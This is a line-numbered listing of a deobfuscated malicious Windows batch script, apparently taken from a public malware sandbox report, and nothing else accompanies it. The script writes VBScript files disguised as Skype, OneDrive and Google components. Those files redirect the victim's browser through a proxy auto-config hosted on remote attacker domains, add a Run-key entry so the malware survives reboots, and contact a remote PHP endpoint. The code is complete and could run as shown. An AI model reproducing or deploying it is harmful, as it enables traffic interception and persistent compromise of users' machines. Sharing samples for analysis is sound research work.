Deobfuscated Mal Batch file

1. :: Shared on https://www.hybrid-analysis.com/sample/1c1d4bb9c66ba15a4c9767168eca450376a1495c0c86bc818e1682ff2bdc2407?environmentId=100
2. @echo off
3.  
4. Set auei=0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
5.  
6. cls
7.  
8. @echo off
9.  
10. cls
11.  
12. cd C:\ProgramData
13.  
14. cls
15.  
16. cls
17.  
18. cls
19.  
20. md Temporario
21.  
22. cls
23.  
24. cd Temporario
25.  
26. cls
27.  
28. cls
29.  
30. cls
31.  
32. echo DEXA EU RALA FDP > xherecasveiasraspadas.js
33.  
34. cls
35.  
36. cd A980S98DF89AS90DF9089SAD890FA089SD89F0890ASD89F0890ASD890F89A0SD09F890SAD890F890ASD890F089A0SD89F
37.  
38. cls
39.  
40. cd C:\ProgramData
41.  
42. cls
43.  
44. cls
45.  
46. md Microsoft OneDrive
47.  
48. cls
49.  
50. cd Microsoft OneDrive
51.  
52. cls
53.  
54. md setup
55.  
56. cls
57.  
58. cd setup
59.  
60. cls
61.  
62. cls
63.  
64. echo On Error Resume Next > Skype.vbs
65.  
66. echo Const HKEY_LOCAL_MACHINE =
67. auei:~43,1%80000002  >> Skype.vbs
68.  
69. echo strComputer = "." >> Skype.vbs
70.  
71. echo Set BUNDAPRETAShell = WScript.CreateObject("WScript.Shell") >> Skype.vbs
72.  
73. echo Set oBUNDAPRETAShell = Wscript.CreateObject("Wscript.Shell") >> Skype.vbs
74.  
75. echo dim xvIDEOSHttp: Set xvIDEOSHttp = createobject("Microsoft.XMLHTTP") >> Skype.vbs
76.  
77. echo dim bUCETUDAStrm: Set bUCETUDAStrm = createobject("Adodb.Stream") >> Skype.vbs
78.  
79. echo WScript.Sleep 120000 >> Skype.vbs
80.  
81. echo Chave = BUNDAPRETAShell.RegRead("HKCU\Software\Microsoft\Windows\currentVersion\Internet Settings\AutoConfigURL") >> Skype.vbs
82.  
83. echo If Chave = "" Then  >> Skype.vbs
84.  
85. echo    valor = "http://mkt.detcaminhoes.com.br/busca/" >> Skype.vbs
86.  
87. echo    oBUNDAPRETAShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable", 0, "REG_DWORD"  >> Skype.vbs
88.  
89. echo    oBUNDAPRETAShell.RegWrite "HKCU\Software\Microsoft\Windows\currentVersion\Internet Settings\AutoConfigURL", valor, "REG_SZ" >> Skype.vbs
90.  
91. echo Else >> Skype.vbs
92.  
93. echo    valor = "http://mkt.detcaminhoes.com.br/busca/" >> Skype.vbs
94.  
95. echo    oBUNDAPRETAShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable", 0, "REG_DWORD" >> Skype.vbs
96.  
97. echo    oBUNDAPRETAShell.RegWrite "HKCU\Software\Microsoft\Windows\currentVersion\Internet Settings\AutoConfigURL", valor, "REG_SZ" >> Skype.vbs
98.  
99. echo End If  >> Skype.vbs
100.  
101. cls
102.  
103. cls
104.  
105. cls
106.  
107. echo WScript.Sleep 120000 >> Skype.vbs
108.  
109. echo Chave = BUNDAPRETAShell.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindoW") >> Skype.vbs
110.  
111. echo If Chave = "" Then  >> Skype.vbs
112.  
113. echo    valor = "C:\ProgramData\Temp\control.vbs" >> Skype.vbs
114.  
115. echo    oBUNDAPRETAShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindoW", valor, "REG_SZ" >> Skype.vbs
116.  
117. echo Else >> Skype.vbs
118.  
119. echo    valor = "C:\ProgramData\Temp\control.vbs" >> Skype.vbs
120.  
121. echo    oBUNDAPRETAShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindoW", valor, "REG_SZ" >> Skype.vbs
122.  
123. echo End If  >> Skype.vbs
124.  
125. cls
126.  
127. cls
128.  
129. cls
130.  
131. cls
132.  
133. echo Dim shl  >> Skype.vbs
134.  
135. echo   Set shl = CreateObject("Wscript.Shell")  >> Skype.vbs
136.  
137. echo   Call shl.Run("""C:\ProgramData\Microsoft OneDrive\setup\Skype.vbs""")  >> Skype.vbs
138.  
139. echo   Set shl = Nothing    >> Skype.vbs
140.  
141. echo   WScript.Quit >> Skype.vbs
142.  
143. echo WScript.Quit  >> Skype.vbs
144.  
145. cls
146.  
147. cls
148.  
149. cls
150.  
151. cls
152.  
153. cls
154.  
155. cls
156.  
157. cls
158.  
159. cls
160.  
161. start Skype.vbs
162.  
163. cls
164.  
165. cls
166.  
167. cd A980S98DF89AS90DF9089SAD890FA089SD89F0890ASD89F0890ASD890F89A0SD09F890SAD890F890ASD890F089A0SD89F
168.  
169. cls
170.  
171. cd C:\ProgramData
172.  
173. cls
174.  
175. cls
176.  
177. cls
178.  
179. md Temp
180.  
181. cls
182.  
183. cd Temp
184.  
185. cls
186.  
187. cls
188.  
189. cls
190.  
191. cls
192.  
193. echo On Error Resume Next > control.vbs
194.  
195. echo Const HKEY_LOCAL_MACHINE =
196. auei:~43,1%80000002  >> control.vbs
197.  
198. echo strComputer = "." >> control.vbs
199.  
200. echo Set BUNDAPRETAShell = WScript.CreateObject("WScript.Shell") >> control.vbs
201.  
202. echo Set oBUNDAPRETAShell = Wscript.CreateObject("Wscript.Shell") >> control.vbs
203.  
204. echo dim xvIDEOSHttp: Set xvIDEOSHttp = createobject("Microsoft.XMLHTTP") >> control.vbs
205.  
206. echo dim bUCETUDAStrm: Set bUCETUDAStrm = createobject("Adodb.Stream") >> control.vbs
207.  
208. echo WScript.Sleep 120000 >> control.vbs
209.  
210. echo Chave = BUNDAPRETAShell.RegRead("HKCU\Software\Microsoft\Windows\currentVersion\Internet Settings\AutoConfigURL") >> control.vbs
211.  
212. echo If Chave = "" Then  >> control.vbs
213.  
214. echo    valor = "http://dyndns.vpsbrasil.club/vaikarai/" >> control.vbs
215.  
216. echo    oBUNDAPRETAShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable", 0, "REG_DWORD"  >> control.vbs
217.  
218. echo    oBUNDAPRETAShell.RegWrite "HKCU\Software\Microsoft\Windows\currentVersion\Internet Settings\AutoConfigURL", valor, "REG_SZ" >> control.vbs
219.  
220. echo Else >> control.vbs
221.  
222. echo    valor = "http://dyndns.vpsbrasil.club/vaikarai/" >> control.vbs
223.  
224. echo    oBUNDAPRETAShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable", 0, "REG_DWORD" >> control.vbs
225.  
226. echo    oBUNDAPRETAShell.RegWrite "HKCU\Software\Microsoft\Windows\currentVersion\Internet Settings\AutoConfigURL", valor, "REG_SZ" >> control.vbs
227.  
228. echo End If  >> control.vbs
229.  
230. echo Dim shl  >> control.vbs
231.  
232. echo   Set shl = CreateObject("Wscript.Shell")  >> control.vbs
233.  
234. echo   Call shl.Run("""C:\ProgramData\Temp\control.vbs""")  >> control.vbs
235.  
236. echo   Set shl = Nothing    >> control.vbs
237.  
238. echo   WScript.Quit >> control.vbs
239.  
240. cls
241.  
242. cls
243.  
244. cls
245.  
246. cls
247.  
248. cls
249.  
250. cls
251.  
252. cls
253.  
254. cls
255.  
256. cls
257.  
258. cls
259.  
260. cls
261.  
262. cls
263.  
264. cls
265.  
266. cd C:\ProgramData
267.  
268. cls
269.  
270. cls
271.  
272. cls
273.  
274. md Temp
275.  
276. cls
277.  
278. cd Temp
279.  
280. cls
281.  
282. md Google
283.  
284. cls
285.  
286. cd Google
287.  
288. cls
289.  
290. cls
291.  
292. cls
293.  
294. md Google
295.  
296. md Chrome
297.  
298. md Java
299.  
300. md Drive
301.  
302. md Bing
303.  
304. md Flash Player
305.  
306. cls
307.  
308. cd Google
309.  
310. cls
311.  
312. cls
313.  
314. echo Dim oXMLHTTP > GetUrl.vbs
315.  
316. echo Dim oStream >> GetUrl.vbs
317.  
318. echo Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP.3.0") >> GetUrl.vbs
319.  
320. echo oXMLHTTP.Open "GET", "http://fernandacampospb.com.br/nefertari/90AS98DF.php", False >> GetUrl.vbs
321.  
322. echo oXMLHTTP.Send >> GetUrl.vbs
323.  
324. cls
325.  
326. cls
327.  
328. cls
329.  
330. cls
331.  
332. cls
333.  
334. cls
335.  
336. cls
337.  
338. cls
339.  
340. cls
341.  
342. start GetUrl.vbs
343.  
344. cls
345.  
346. cls
347.  
348. cls
349.  
350. cls
351.  
352. cls
353.  
354. cls
355.  
356. cls
357.  
358. cls
359.  
360. exit